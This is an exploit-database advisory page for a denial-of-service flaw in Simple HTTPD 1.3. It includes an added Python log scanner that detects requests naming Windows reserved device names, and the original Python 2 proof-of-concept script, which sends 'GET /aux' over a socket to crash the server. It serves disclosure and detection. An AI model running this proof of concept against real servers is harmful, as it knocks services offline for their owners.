Vendor: Simple HTTPD
By: shinnai
CVSS: 5.5 (MEDIUM)
CWE: Denial of Service
Product Name: Simple HTTPD
Affected Version From: 1.3
Affected Version To: 1.3
Patch Exists: NO
2007

Simple HTTPD 1.3 /aux Denial of Service

This exploit targets the Simple HTTPD 1.3 server by sending a specific GET request to the /aux endpoint, causing a denial of service condition. The vulnerability exists in the way the server handles this particular request, leading to a crash or unresponsiveness. The exploit utilizes a socket connection to send the malicious request to the target host and port. This vulnerability was discovered by shinnai and the details can be found on their website at http://shinnai.altervista.org.

Mitigation:

There is no known mitigation or remediation for this vulnerability. It is recommended to upgrade to a newer version of the Simple HTTPD server or switch to a different web server software.
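
A front-end detection check for the request described above, as an added example that is not part of the original advisory or PoC: it flags logged request paths containing a segment that resolves to a Windows reserved device name. That the crash stems from `aux` being such a device name is an assumption (the page does not state the root cause); the names beyond AUX, the function names and the log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Windows reserved device names. The page names only /aux; the rest are an
# added generalization, on the assumption that the device name is the trigger.
RESERVED = {"CON", "PRN", "AUX", "NUL"}
RESERVED |= {"COM%d" % i for i in range(1, 10)} | {"LPT%d" % i for i in range(1, 10)}

# Request field of a Common Log Format line: "METHOD target HTTP/x.y"
LOG_REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?"')


def reserved_segment(target):
    """Return the first path segment that resolves to a reserved device name, else None."""
    # Drop query string and fragment, then decode %xx so "a%75x" is seen as "aux".
    path = unquote(target.split("?", 1)[0].split("#", 1)[0])
    for seg in re.split(r"[/\\]", path):
        # Win32 path handling has historically ignored trailing dots/spaces,
        # extensions and stream suffixes, so "aux.txt" and "aux." count too.
        base = seg.rstrip(". ").split(".", 1)[0].split(":", 1)[0].upper()
        if base in RESERVED:
            return seg
    return None


def scan(lines):
    """Return (line_number, target, segment) for every flagged log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_REQUEST.search(line)
        if not m:
            continue
        seg = reserved_segment(m.group("target"))
        if seg is not None:
            hits.append((n, m.group("target"), seg))
    return hits


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Dec/2007:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '192.0.2.44 - - [11/Dec/2007:10:00:02 +0000] "GET /aux HTTP/1.1" - -',
    '192.0.2.44 - - [11/Dec/2007:10:00:03 +0000] "GET /docs/a%75x.txt?x=1 HTTP/1.1" - -',
    '192.0.2.10 - - [11/Dec/2007:10:00:04 +0000] "GET /auxiliary/info HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for n, target, seg in scan(SAMPLE_LOG):
        print("line %d: %s (segment %r)" % (n, target, seg))
```

The same `reserved_segment` check can sit in a reverse proxy or request filter in front of the server to reject such paths before they reach it.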

Exploit-DB raw data:

#usage: poc.py host port

import socket
import sys

print "-----------------------------------------------------------------------"
print "Simple HTTPD 1.3 /aux Denial of Service\n"
print "url: http://shttpd.sourceforge.net\n"
print "author: shinnai"
print "mail: shinnai[at]autistici[dot]org"
print "site: http://shinnai.altervista.org"
print "-----------------------------------------------------------------------"

host = sys.argv[1]
port = long(sys.argv[2])

try:
   request =  "GET /aux HTTP/1.1\n\n"
   connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   connection.connect((host, port))
   connection.send(request)
except:
   print "Unable to connect. exiting."

# milw0rm.com [2007-12-11]